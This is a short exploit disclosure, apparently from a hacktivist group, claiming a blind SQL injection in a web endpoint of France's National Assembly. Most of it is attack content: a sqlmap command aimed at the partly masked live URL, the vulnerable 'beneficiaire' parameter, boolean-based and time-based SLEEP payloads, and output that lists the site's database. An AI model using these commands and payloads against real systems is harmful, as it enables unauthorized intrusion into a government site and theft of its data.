# Exploit Title : National Assembly of France ( Fransa Ulusal Meclis ) Blind SQL İnjection
# Team : Sanal Türk Ordusu "Turkish Cyber Army"
# Date : 21/03/2020
# Tested On : Kali Linux
# Contact : instagram.com/rootayyildiz/

sqlmap -u http://ww*****ale.fr/reserve_parlementaire/reserve_parlementaire_detail_json?beneficiaire=140763 --dbs --batch

Parameter: beneficiaire (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: beneficiaire=140763 AND 3879=3879

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: beneficiaire=140763 OR SLEEP(5)


available databases [1]:
[*] reserve_parlementaire